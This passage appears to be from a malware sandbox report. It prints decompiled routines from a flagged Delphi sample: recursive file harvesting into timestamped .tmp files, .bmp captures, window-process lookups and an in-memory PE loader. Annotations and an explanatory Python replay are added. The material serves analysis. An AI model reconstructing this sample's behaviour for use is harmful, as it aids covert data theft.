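Because the file is opened with OPEN_EXISTING rather than OPEN_ALWAYS, the caller of E2405219C must create the log file elsewhere before the first append; a hunt for that creation site (a CreateFileA with disposition 2 or 4, or a CopyFile) is the natural next step when tracing where this routine's output ends up.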

                                    C-Code - Quality: 100%
                                    			// Matches the Delphi RTL's SysUtils.FindMatchingFile, the body shared by FindFirst and FindNext.
                                    			// __eax is a TSearchRec: skip entries whose WIN32_FIND_DATA attributes (_t30[0xc]) intersect
                                    			// ExcludeAttr (_t30[8]), then fill Time (DOS date/time from ftLastWriteTime), Size, Attr and Name.
                                    			// Returns 0 on a match, otherwise GetLastError() (ERROR_NO_MORE_FILES when the listing is exhausted).
                                    			E24015DF8(WORD* __eax) {
                                    				struct _FILETIME _v12;
                                    				long _t20;
                                    				WORD* _t30;
                                    				void* _t35;
                                    				struct _FILETIME* _t36;
                                    
                                    				_t36 = _t35 + 0xfffffff8;
                                    				_t30 = __eax;
                                    				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                    					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                    						continue;
                                    					} else {
                                    						_t20 = GetLastError();
                                    					}
                                    					L5:
                                    					return _t20;
                                    				}
                                    				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                    				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                    				_t30[2] = _t30[0x1c];
                                    				_t30[4] = _t30[0xc].dwFileAttributes;
                                    				E240132EC( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                    				_t20 = 0;
                                    				goto L5;
                                    			}

                                    0x24015df9
                                    0x24015dfc
                                    0x24015e18
                                    0x24015e0f
                                    0x00000000
                                    0x24015e11
                                    0x24015e11
                                    0x24015e11
                                    0x24015e57
                                    0x24015e5a
                                    0x24015e5a
                                    0x24015e25
                                    0x24015e34
                                    0x24015e3c
                                    0x24015e42
                                    0x24015e50
                                    0x24015e55
                                    0x00000000

                                    APIs
                                    • FindNextFileA.KERNEL32(?,?), ref: 24015E08
                                    • GetLastError.KERNEL32(?,?), ref: 24015E11
                                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 24015E25
                                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 24015E34
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileTime$DateErrorFindLastLocalNext
                                    • String ID:
                                    • API String ID: 2103556486-0
                                    • Opcode ID: 30394785ffedbd128b073228050ec16ea56634397081f98a4446c0468ed105bc
                                    • Instruction ID: 30b542861af9b95c935578d66826676e138c2e0e2c448d167219a7f664d14447
                                    • Opcode Fuzzy Hash: 30394785ffedbd128b073228050ec16ea56634397081f98a4446c0468ed105bc
                                    • Instruction Fuzzy Hash: 17F037B66042009FDF08DFA4D8C1D8B33ECAF5822470489A6ED18CF24EE634E594CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%
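E24015DF8 is the attribute-filtering loop that Delphi's FindFirst and FindNext share, and the 0x2f and 0x10 masks handed to E240163E8 later on this page (in E24043548) are the Attr values that feed it. The Python below is an added illustration, not code from the report or from the sample: it replays that filtering over a constructed directory listing and shows why a faDirectory search still has to test the directory bit itself and skip "." and "..". The listing and the timestamp are constructed; the fa* values and the ExcludeAttr rule are those of the Delphi RTL.

```python
"""Delphi FindFirst/FindNext attribute filtering, replayed over a constructed directory listing."""

# Win32 FILE_ATTRIBUTE_* bits; Delphi's fa* constants use the same values.
FA_READONLY, FA_HIDDEN, FA_SYSFILE, FA_VOLUMEID, FA_DIRECTORY, FA_ARCHIVE = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FA_ANYFILE = 0x3F
# SysUtils.FindFirst can only *exclude* these four; read-only, archive and plain files always come back.
FA_SPECIAL = FA_HIDDEN | FA_SYSFILE | FA_VOLUMEID | FA_DIRECTORY

# Constructed listing, in the order FindFirstFile/FindNextFile would return it for "*.*".
# The "." and ".." pseudo-entries are genuine Win32 results, which is why walkers compare against them.
SAMPLE_LISTING = [
    (".", FA_DIRECTORY),
    ("..", FA_DIRECTORY),
    ("notes.txt", FA_ARCHIVE),
    ("desktop.ini", FA_HIDDEN | FA_SYSFILE | FA_ARCHIVE),
    ("Documents", FA_DIRECTORY),
    ("System Volume Information", FA_DIRECTORY | FA_HIDDEN | FA_SYSFILE),
    ("keys.tmp", FA_ARCHIVE),
]


def exclude_attr(attr):
    """FindFirst stores ExcludeAttr := not Attr and faSpecial in the TSearchRec."""
    return (~attr) & FA_SPECIAL


def find_matching(listing, attr):
    """The while loop in E24015DF8: advance past every entry whose attributes intersect
    ExcludeAttr and return, in order, the (name, attr) pairs a FindFirst/FindNext sequence
    hands back for this Attr."""
    excl = exclude_attr(attr)
    return [(name, a) for name, a in listing if a & excl == 0]


def subdirs_to_recurse(listing):
    """What E24043548's inner loop keeps after FindFirst(..., faDirectory): with Attr = 0x10 plain
    files are still returned, so the caller must test the directory bit itself (the `_v356 & 0x10`
    check) and drop "." and "..", otherwise the walk recurses into its own parent forever."""
    return [name for name, a in find_matching(listing, FA_DIRECTORY)
            if (a & FA_DIRECTORY) and name not in (".", "..")]


def dos_datetime(year, month, day, hour, minute, second):
    """FileTimeToDosDateTime packing of a local time, combined the way TSearchRec.Time stores it
    (LongRec.Hi = DOS date, LongRec.Lo = DOS time; seconds are kept at 2-second resolution)."""
    dos_date = ((year - 1980) << 9) | (month << 5) | day
    dos_time = (hour << 11) | (minute << 5) | (second // 2)
    return (dos_date << 16) | dos_time


if __name__ == "__main__":
    print("Attr=0x2f (files only):", [n for n, _ in find_matching(SAMPLE_LISTING, 0x2F)])
    print("Attr=0x10 (faDirectory):", [n for n, _ in find_matching(SAMPLE_LISTING, FA_DIRECTORY)])
    print("recurse into:", subdirs_to_recurse(SAMPLE_LISTING))
    print(hex(dos_datetime(2021, 4, 1, 12, 30, 45)))
```

Two points fall out of the replay. Attr = 0x2f is faAnyFile without faDirectory, so hidden and system files (desktop.ini here) are returned and only directories are skipped; that is the file pass of E24043548. Attr = 0x10 excludes hidden, system and volume entries but still returns ordinary files, which is exactly why the decompiled loop tests `_v356 & 0x10` before comparing the name against two string constants and recursing.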

                                    C-Code - Quality: 100%
                                    			E24015AC8(struct tagMSG* __eax) {
                                    				long _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) { // WM_QUIT is returned to the caller, never dispatched
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(1);
                                    				return _t7;
                                    			}

                                    0x24015aca
                                    0x24015acc
                                    0x24015ade
                                    0x24015ae0
                                    0x24015ae6
                                    0x24015ae9
                                    0x24015aef
                                    0x24015aef
                                    0x24015ae6
                                    0x24015af6
                                    0x24015aff

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 24015AD7
                                    • TranslateMessage.USER32 ref: 24015AE9
                                    • DispatchMessageA.USER32 ref: 24015AEF
                                    • Sleep.KERNEL32(00000001,?,00000000,00000000,00000000,00000001,?,00000000,24015B0A), ref: 24015AF6
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: 3dee2935046c145a20310657923f066b4c1650418999a03fa847e1f3cf1e7d93
                                    • Instruction ID: ec003d8bd3dd4e3304982c0b8c72bc4a419aab1b3e91c21113df2684906d3d7b
                                    • Opcode Fuzzy Hash: 3dee2935046c145a20310657923f066b4c1650418999a03fa847e1f3cf1e7d93
                                    • Instruction Fuzzy Hash: 06E017323837203AFB2156A40C82F9E62884F22A8EF904136F609AE0C4CAD5598082A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2401548A(void* __eax, int __ecx, long __edx) {
                                    				void* _t2;
                                    				void* _t4;
                                    
                                    				_t2 = GlobalHandle(__eax);
                                    				GlobalUnWire(_t2);
                                    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                    				GlobalFix(_t4);
                                    				return _t4;
                                    			}

                                    0x2401548f
                                    0x24015496
                                    0x2401549b
                                    0x240154a1
                                    0x240154a6

                                    APIs
                                    • GlobalHandle.KERNEL32 ref: 2401548F
                                    • GlobalUnWire.KERNEL32(00000000), ref: 24015496
                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 2401549B
                                    • GlobalFix.KERNEL32(00000000), ref: 240154A1
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Global$AllocHandleWire
                                    • String ID:
                                    • API String ID: 2210401237-0
                                    • Opcode ID: 505157e451beb4b904f6f62bc6a33cc31f1955a287db27c020f03c767c2bc075
                                    • Instruction ID: 6b35823ccddb0685b72670d5de8fa8187fdb398a74d14d3d294bcd9ea60d1cc9
                                    • Opcode Fuzzy Hash: 505157e451beb4b904f6f62bc6a33cc31f1955a287db27c020f03c767c2bc075
                                    • Instruction Fuzzy Hash: 02B002C49906043DBB166BF45C19D3F105C9FB450978449543448DA008D8689E9840B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E24043548(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				char _v9;
                                    				char _v10;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _v352;
                                    				signed int _v356;
                                    				char _v364;
                                    				char _v368;
                                    				char _v372;
                                    				char _v376;
                                    				char _v380;
                                    				char _v384;
                                    				char _v388;
                                    				signed int _t93;
                                    				signed int _t97;
                                    				void* _t114;
                                    				void* _t136;
                                    				intOrPtr _t157;
                                    				intOrPtr _t162;
                                    				intOrPtr _t163;
                                    				intOrPtr _t165;
                                    				intOrPtr _t169;
                                    				intOrPtr _t170;
                                    				intOrPtr _t179;
                                    				void* _t185;
                                    				void* _t186;
                                    				intOrPtr _t187;
                                    
                                    				_t183 = __esi;
                                    				_t182 = __edi;
                                    				_t185 = _t186;
                                    				_t187 = _t186 + 0xfffffe80;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v388 = 0;
                                    				_v384 = 0;
                                    				_v376 = 0;
                                    				_v380 = 0;
                                    				_v372 = 0;
                                    				_v368 = 0;
                                    				_v16 = 0;
                                    				_v20 = 0;
                                    				_v9 = __ecx;
                                    				_v8 = __edx;
                                    				_t136 = __eax;
                                    				_t157 =  *0x24015a98; // 0x24015a9c
                                    				E240139CC( &_v364, _t157);
                                    				_push(_t185);
                                    				_push(0x24043832);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t187;
                                    				_v10 = 0;
                                    				E24013120( &_v16, _t136);
                                    				E24013088(_a4);
                                    				if( *((char*)(_v16 + E2401333C(_v16) - 1)) != 0x5c) { // last character of the directory path is not '\' (0x5c): append a separator
                                    					E24013344( &_v16, 0x24043850);
                                    				}
                                    				_push(_t185);
                                    				_push(0x240436f4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t187;
                                    				E24013388( &_v368, _v8, _v16);
                                    				if(E240163E8(_v368,  &_v364, 0x2f) != 0) { // FindFirst(path + mask, Attr = 0x2f = faAnyFile and not faDirectory, SearchRec at &_v364); non-zero = no match
                                    					_pop(_t162);
                                    					 *[fs:eax] = _t162;
                                    					__eflags = _v9;
                                    					if(_v9 == 0) {
                                    						L21:
                                    						__eflags = 0;
                                    						_pop(_t163);
                                    						 *[fs:eax] = _t163;
                                    						_push(0x24043839);
                                    						E240130AC( &_v388, 6);
                                    						_t165 =  *0x24015a98; // 0x24015a9c
                                    						E24013A90( &_v364, _t165);
                                    						return E240130AC( &_v20, 2);
                                    					} else {
                                    						_push(_t185);
                                    						_push(0x240437ec);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t187;
                                    						E24013388( &_v384, 0x2404386c, _v16);
                                    						_t93 = E240163E8(_v384,  &_v364, 0x10); // FindFirst(..., Attr = faDirectory (0x10), ...): plain files are still returned, only hidden/system/volume entries are filtered
                                    						__eflags = _t93;
                                    						if(_t93 != 0) {
                                    							_pop(_t169);
                                    							 *[fs:eax] = _t169;
                                    							goto L21;
                                    						} else {
                                    							__eflags = 0;
                                    							_push(_t185);
                                    							_push(0x240437db);
                                    							_push( *[fs:eax]);
                                    							 *[fs:eax] = _t187;
                                    							while(1) {
                                    								__eflags = _v356 & 0x00000010; // SearchRec.Attr (offset 8) and faDirectory: recurse into directories only
                                    								if((_v356 & 0x00000010) != 0) {
                                    									E24013480(_v352, 0x24043878);
                                    									if(__eflags != 0) {
                                    										E24013480(_v352, 0x24043884);
                                    										if(__eflags != 0) {
                                    											E24013388( &_v388, _v352, _v16);
                                    											_v10 = E24043548(_v388, _t136, 1, _v8, _t182, _t183, _a4);
                                    										}
                                    									}
                                    								}
                                    								_t97 = E24015E5C( &_v364);
                                    								__eflags = _t97;
                                    								if(_t97 != 0) {
                                    									break;
                                    								}
                                    								__eflags = _v10 - 1;
                                    								if(_v10 != 1) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							__eflags = 0;
                                    							_pop(_t170);
                                    							 *[fs:eax] = _t170;
                                    							_push(0x240437e2);
                                    							return E24015DDC( &_v364);
                                    						}
                                    					}
                                    				} else {
                                    					_push(_t185);
                                    					_push(0x240436e3);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t187;
                                    					do {
                                    						_t152 = _v352;
                                    						E24013388( &_v372, _v352, _v16);
                                    						_t114 = E2401333C(_v372);
                                    						_t191 = _t114 - 3;
                                    						if(_t114 > 3) {
                                    							_v10 = 1;
                                    							_t152 = _v352;
                                    							E24013388(_a4, _v352, _v16);
                                    						}
                                    						E24017038( &_v376);
                                    						_push(_v376);
                                    						E240158BC( &_v380, _t152, 0, GetTickCount(), 0);
                                    						_push(_v380);
                                    						_push(".tmp");
                                    						E240133FC();
                                    						E24016DA0(_v20, _t136, 0, 0, _t183, _t191);
                                    						E24016634(_v20, _t136, _t182, _t183, _t191);
                                    					} while (E24015E5C( &_v364) == 0 && _v10 != 1);
                                    					_pop(_t179);
                                    					 *[fs:eax] = _t179;
                                    					_push(0x240436ea);
                                    					return E24015DDC( &_v364);
                                    				}
                                    			}

                                    0x24043548
                                    0x24043548
                                    0x24043549
                                    0x2404354b
                                    0x24043551
                                    0x24043552
                                    0x24043553
                                    0x24043556
                                    0x2404355c
                                    0x24043562
                                    0x24043568
                                    0x2404356e
                                    0x24043574
                                    0x2404357a
                                    0x2404357d
                                    0x24043580
                                    0x24043583
                                    0x24043586
                                    0x2404358e
                                    0x24043594
                                    0x2404359b
                                    0x2404359c
                                    0x240435a1
                                    0x240435a4
                                    0x240435a7

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick
                                    • String ID: *.*$.tmp
                                    • API String ID: 536389180-2468557045
                                    • Opcode ID: 215e903d0c2b7747ec63faeb126c53ab73d67b6c0f67ac7af5a966e4d368dce6
                                    • Instruction ID: 37253bb79b1bfd5732f7910031b3fb312b6d8f74392ec756935e3339d8d5c105
                                    • Opcode Fuzzy Hash: 215e903d0c2b7747ec63faeb126c53ab73d67b6c0f67ac7af5a966e4d368dce6
                                    • Instruction Fuzzy Hash: F1715034E042189FEB11DF61EC90ADEBBB5EB59304F5081F9D808A6654DB719EC5CE50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E24043260(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                    				char _v5;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _v348;
                                    				signed int _v352;
                                    				char _v360;
                                    				char _v364;
                                    				char _v368;
                                    				char _v372;
                                    				char _v376;
                                    				char _v380;
                                    				char _v384;
                                    				signed int _t77;
                                    				signed int _t80;
                                    				void* _t96;
                                    				void* _t116;
                                    				intOrPtr _t132;
                                    				intOrPtr _t137;
                                    				intOrPtr _t139;
                                    				intOrPtr _t144;
                                    				intOrPtr _t152;
                                    				void* _t155;
                                    				void* _t156;
                                    				void* _t158;
                                    				void* _t159;
                                    				intOrPtr _t160;
                                    
                                    				_t156 = __esi;
                                    				_t155 = __edi;
                                    				_t158 = _t159;
                                    				_t160 = _t159 + 0xfffffe84;
                                    				_v384 = 0;
                                    				_v380 = 0;
                                    				_v372 = 0;
                                    				_v376 = 0;
                                    				_v368 = 0;
                                    				_v364 = 0;
                                    				_v12 = 0;
                                    				_v16 = 0;
                                    				_v5 = __edx;
                                    				_t116 = __eax;
                                    				_t132 =  *0x24015a98; // 0x24015a9c
                                    				E240139CC( &_v360, _t132);
                                    				_push(_t158);
                                    				_push(0x240434ef);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t160;
                                    				E24013120( &_v12, _t116);
                                    				if( *((char*)(_v12 + E2401333C(_v12) - 1)) != 0x5c) {
                                    					E24013344( &_v12, 0x24043504);
                                    				}
                                    				E24013388( &_v364, 0x24043510, _v12);
                                    				if(E240163E8(_v364,  &_v360, 0x2f) != 0) {
                                    					__eflags = _v5;
                                    					if(_v5 == 0) {
                                    						L17:
                                    						__eflags = 0;
                                    						_pop(_t137);
                                    						 *[fs:eax] = _t137;
                                    						_push(0x240434f6);
                                    						E240130AC( &_v384, 6);
                                    						_t139 =  *0x24015a98; // 0x24015a9c
                                    						E24013A90( &_v360, _t139);
                                    						return E240130AC( &_v16, 2);
                                    					} else {
                                    						E24013388( &_v380, 0x24043510, _v12);
                                    						_t77 = E240163E8(_v380,  &_v360, 0x10);
                                    						__eflags = _t77;
                                    						if(_t77 != 0) {
                                    							goto L17;
                                    						} else {
                                    							__eflags = 0;
                                    							_push(_t158);
                                    							_push(0x240434ac);
                                    							_push( *[fs:eax]);
                                    							 *[fs:eax] = _t160;
                                    							do {
                                    								__eflags = _v352 & 0x00000010;
                                    								if((_v352 & 0x00000010) != 0) {
                                    									E24013480(_v348, 0x24043538);
                                    									if(__eflags != 0) {
                                    										E24013480(_v348, 0x24043544);
                                    										if(__eflags != 0) {
                                    											E24013388( &_v384, _v348, _v12);
                                    											E24043260(_v384, _t116, 1, _t155, _t156);
                                    										}
                                    									}
                                    								}
                                    								_t80 = E24015E5C( &_v360);
                                    								__eflags = _t80;
                                    							} while (_t80 == 0);
                                    							__eflags = 0;
                                    							_pop(_t144);
                                    							 *[fs:eax] = _t144;
                                    							_push(0x240434b3);
                                    							return E24015DDC( &_v360);
                                    						}
                                    					}
                                    				} else {
                                    					_push(_t158);
                                    					_push(0x240433e6);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t160;
                                    					do {
                                    						_t127 = _v348;
                                    						E24013388( &_v368, _v348, _v12);
                                    						_t96 = E2401333C(_v368);
                                    						_t164 = _t96 - 3;
                                    						if(_t96 > 3) {
                                    							_push( *0x24063274);
                                    							_push(_v12);
                                    							_push(_v348);
                                    							_push(0x2404351c);
                                    							E240133FC();
                                    						}
                                    						E24017038( &_v372);
                                    						_push(_v372);
                                    						E240158BC( &_v376, _t127, 0, GetTickCount(), 0);
                                    						_push(_v376);
                                    						_push(".tmp");
                                    						E240133FC();
                                    						E24016DA0(_v16, _t116, 0, 0, _t156, _t164);
                                    						E24016634(_v16, _t116, _t155, _t156, _t164);
                                    					} while (E24015E5C( &_v360) == 0);
                                    					_pop(_t152);
                                    					 *[fs:eax] = _t152;
                                    					_push(0x240433ed);
                                    					return E24015DDC( &_v360);
                                    				}
                                    			}


                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick
                                    • String ID: *.*$.tmp
                                    • API String ID: 536389180-2468557045
                                    • Opcode ID: dea71bdec357385d546c9d4b0d664928b877121005b96e2f1b09aa287177ce46
                                    • Instruction ID: d1578ef7fe3caef001175479f2ee01a6438ae49632ed9a4af3455219784554d6
                                    • Opcode Fuzzy Hash: dea71bdec357385d546c9d4b0d664928b877121005b96e2f1b09aa287177ce46
                                    • Instruction Fuzzy Hash: 06512E34E082589FEF15DBA0EC90ADEB7B5EB95304F5041F5980CA2258DA75AEC58E50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 48%
                                    			E24040224(struct HWND__* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				long _v12;
                                    				char _v16;
                                    				char _v20;
                                    				struct HWND__* _t65;
                                    				intOrPtr _t79;
                                    				intOrPtr _t82;
                                    				void* _t97;
                                    				intOrPtr _t99;
                                    				intOrPtr _t100;
                                    
                                    				_t99 = _t100;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_t97 = __edx;
                                    				_t65 = __eax;
                                    				_push(_t99);
                                    				_push(0x24040372);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t100;
                                    				E24013088(__edx);
                                    				if(IsWindow(_t65) != 0) {
                                    					_v12 = 0xffffffff;
                                    					GetWindowThreadProcessId(_t65,  &_v12);
                                    					_push(_t99);
                                    					_push(0x24040345);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t100;
                                    					if(E240401F0( &_v8, _t65, 1, __edi, _t97) != 0) {
                                    						E240158BC( &_v16, 0, 0, _v12, 0);
                                    						E24013344( &_v16, 0x24040388);
                                    						if(E24013674(_v16, _v8) > 0) {
                                    							E240158BC( &_v20, 0, 0, _v12, 0);
                                    							E24013344( &_v20, 0x24040388);
                                    							E240135D0( &_v8, E24013674(_v20, _v8) - 1, 1);
                                    							E240135D0( &_v8, E24013674(0x24040388, _v8) - 1, 1);
                                    							E240135D0( &_v8, 3, 1);
                                    							E24013590(_v8, E24013674(0x24040388, _v8) - 1, 1, _t97);
                                    						}
                                    					}
                                    					_pop(_t82);
                                    					 *[fs:eax] = _t82;
                                    				}
                                    				_pop(_t79);
                                    				 *[fs:eax] = _t79;
                                    				_push(0x24040379);
                                    				E240130AC( &_v20, 2);
                                    				return E24013088( &_v8);
                                    			}


                                    APIs
                                    • IsWindow.USER32 ref: 2404024A
                                    • GetWindowThreadProcessId.USER32(?,FFFFFFFF), ref: 24040263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ProcessThread
                                    • String ID: #|#
                                    • API String ID: 3635926707-3836175907
                                    • Opcode ID: b6d07c3b43f599eb5bfb450a5e3e1957ba9094c29219a3d3504a286258c8a8fd
                                    • Instruction ID: 8fa68bf8bbf1c1a9312dcd59fd21bb95d7332983f5c62f5b51aff3138c6fc3c1
                                    • Opcode Fuzzy Hash: b6d07c3b43f599eb5bfb450a5e3e1957ba9094c29219a3d3504a286258c8a8fd
                                    • Instruction Fuzzy Hash: 60316770A04108AFFF05EBA4C894DAEB7FDEB98344F5085B5E805B7654EA70AF858960
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24023CEC(void* __eflags, int* _a4) {
                                    				long _v8;
                                    				int _t29;
                                    				int _t43;
                                    				signed char _t44;
                                    				long _t46;
                                    				void* _t48;
                                    				void* _t49;
                                    
                                    				_t43 = E24023838(__eflags,  *_a4);
                                    				_t29 =  *_a4;
                                    				_t48 = ( *(_t29 + 6) & 0x0000ffff) - 1;
                                    				if(_t48 < 0) {
                                    					L16:
                                    					return _t29;
                                    				}
                                    				_t49 = _t48 + 1;
                                    				do {
                                    					if(( *(_t43 + 0x27) & 0x00000002) == 0) {
                                    						_t46 = E24023C74( *(_t43 + 0x24));
                                    						_t44 =  *(_t43 + 0x24);
                                    						__eflags = _t44 & 0x04000000;
                                    						if((_t44 & 0x04000000) != 0) {
                                    							_t46 = _t46 | 0x00000200;
                                    							__eflags = _t46;
                                    						}
                                    						_t29 =  *(_t43 + 0x10);
                                    						__eflags = _t29;
                                    						if(_t29 != 0) {
                                    							L14:
                                    							_t43 = _t43 + 0x28;
                                    							__eflags = _t43;
                                    							goto L15;
                                    						} else {
                                    							__eflags = _t44 & 0x00000040;
                                    							if((_t44 & 0x00000040) == 0) {
                                    								__eflags = _t44 & 0x00000080;
                                    								if((_t44 & 0x00000080) != 0) {
                                    									_t29 =  *( *_a4 + 0x24);
                                    								}
                                    							} else {
                                    								_t29 =  *( *_a4 + 0x20);
                                    							}
                                    							__eflags = _t29;
                                    							if(_t29 <= 0) {
                                    								goto L14;
                                    							} else {
                                    								_t29 = VirtualProtect( *(_t43 + 8),  *(_t43 + 0x10), _t46,  &_v8);
                                    								__eflags = _t29;
                                    								if(_t29 != 0) {
                                    									goto L14;
                                    								}
                                    								return E240130DC(0x2405bb68, "FinalizeSections: VirtualProtect failed");
                                    							}
                                    						}
                                    					}
                                    					_t29 = VirtualFree( *(_t43 + 8),  *(_t43 + 0x10), 0x4000);
                                    					_t43 = _t43 + 0x28;
                                    					L15:
                                    					_t49 = _t49 - 1;
                                    				} while (_t49 != 0);
                                    				goto L16;
                                    			}


                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00004000,?,00000000,?,00000000,?,?,24023F92,?,?,00004550,00004550,?,00000000), ref: 24023D26
                                    • VirtualProtect.KERNEL32(?,00000000,00000000,?,?,?,00000000,?,00000000,?,?,24023F92,?,?,00004550,00004550), ref: 24023D80
                                    Strings
                                    • FinalizeSections: VirtualProtect failed, xrefs: 24023D8E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$FreeProtect
                                    • String ID: FinalizeSections: VirtualProtect failed
                                    • API String ID: 2581862158-3584865983
                                    • Opcode ID: aebf29a56cb0b97b5448127fb502d1542f3e3f1a0a2880443c52a4c048301fb4
                                    • Instruction ID: eea04b1de70a75afee23bb317bbe36416205fe35124f65285a42d89cf033c2b1
                                    • Opcode Fuzzy Hash: aebf29a56cb0b97b5448127fb502d1542f3e3f1a0a2880443c52a4c048301fb4
                                    • Instruction Fuzzy Hash: 59213B72700A00AFEB00CF69E8C4F4A7BECAF59694B014191EE48CF395D2B0E9808B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 62%
                                    			E240379F4(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr* _t46;
                                    				intOrPtr _t56;
                                    				void* _t62;
                                    				void* _t64;
                                    
                                    				_t64 = __eflags;
                                    				_v16 = 0;
                                    				_v20 = 0;
                                    				_t46 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t62);
                                    				_push(0x24037ab6);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62 + 0xfffffff0;
                                    				_v12 = E24012658(1);
                                    				E24037850(_v8, _t46,  &_v12, __edi, __esi, _t64);
                                    				E2402316C(_v12, 0, 0);
                                    				E24017038( &_v16);
                                    				_push(_v16);
                                    				E240158BC( &_v20, 0, 0, GetTickCount(), 0);
                                    				_push(_v20);
                                    				_push(".bmp");
                                    				E240133FC();
                                    				DeleteFileA(E24013534( *_t46));
                                    				E24023640(_v12, _t46,  *_t46);
                                    				E24012688(_v12);
                                    				_pop(_t56);
                                    				 *[fs:eax] = _t56;
                                    				_push(0x24037abd);
                                    				E240130AC( &_v20, 2);
                                    				return E24013088( &_v8);
                                    			}
                                    0x240379f4
                                    0x240379fd
                                    0x24037a00
                                    0x24037a03
                                    0x24037a05
                                    0x24037a0b
                                    0x24037a12
                                    0x24037a13
                                    0x24037a18
                                    0x24037a1b
                                    0x24037a2a
                                    0x24037a33
                                    0x24037a3f
                                    0x24037a47
                                    0x24037a4c
